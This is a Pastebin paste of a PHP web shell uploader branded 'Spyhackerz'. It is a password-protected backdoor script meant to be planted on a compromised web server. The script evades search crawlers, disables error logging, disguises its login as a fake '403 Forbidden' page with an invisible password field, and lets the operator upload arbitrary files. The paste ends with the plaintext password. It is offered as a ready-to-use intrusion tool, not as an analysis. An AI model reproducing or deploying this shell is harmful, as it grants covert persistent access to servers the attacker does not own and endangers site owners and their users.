Advertisement
dravatar

Untitled

May 25th, 2016
254
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.42 KB | None | 0 0
  1. <?php
  2. /*
  3.  
  4. */
  5. $auth_pass = "d1067625416e86ae317cc736f2430a24";
  6. $color = "#00ff00";
  7. $default_action = 'FilesMan';
  8. @define('SELF_PATH', __FILE__);
  9. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  10. header('HTTP/1.0 404 Not Found');
  11. exit;
  12. }
  13. @session_start();
  14. @error_reporting(0);
  15. @ini_set('error_log',NULL);
  16. @ini_set('log_errors',0);
  17. @ini_set('max_execution_time',0);
  18. @set_time_limit(0);
  19. @set_magic_quotes_runtime(0);
  20. @define('VERSION', '2.1');
  21. if( get_magic_quotes_gpc() ) {
  22. function stripslashes_array($array) {
  23. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  24. }
  25. $_POST = stripslashes_array($_POST);
  26. }
  27. function printLogin() {
  28. ?>
  29. <title>403 Forbidden</title>
  30. <h1>Forbidden</h1>
  31. <p>Go Away This is a Protect Upload By Spyhackerz.</p>
  32. <p>Additionally, a 404 Not Found ..Visit www.spyhackerz.com.</p>
  33. <style>
  34. input { margin:0;background-color:#fff;border:1px solid #fff; }
  35. </style>
  36. <center>
  37. <form method=post>
  38. <input type=password name=pass>
  39. </form></center>
  40. <?php
  41. exit;
  42. }
  43. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  44. if( empty( $auth_pass ) ||
  45. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  46. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  47. else
  48. printLogin();
  49.  
  50. ?>
  51. <html>
  52. <head>
  53.  
  54. <title>Spyhackerz Uploader</title>
  55. <body bgcolor="black">
  56. <center>
  57. <img src="http://www.spyhackerz.com/forum/styles/aurora/spylogo.png">
  58. </center>
  59. </body>
  60. </head>
  61. <p align="center">
  62. <font color="black">
  63. <center> <?php
  64. echo '<font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></font>';
  65. echo '<font color="#11f0f3"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font>';
  66. if( $_POST['_upl'] == "Upload" ) {
  67. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b><font face="Iceland" color="11f0f3" size="4px">Done... Uploaded!</font></b><br><br>'; }
  68. else { echo '<b><font face="Iceland" color="11f0f3">File Upload Failed!</font></b><br><br>'; }
  69. }
  70. ?></br></br></hr><font color="#ffffff">http://www.spyhackerz.com/
  71. </center></html>
  72. Password: spyh@ckerz
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement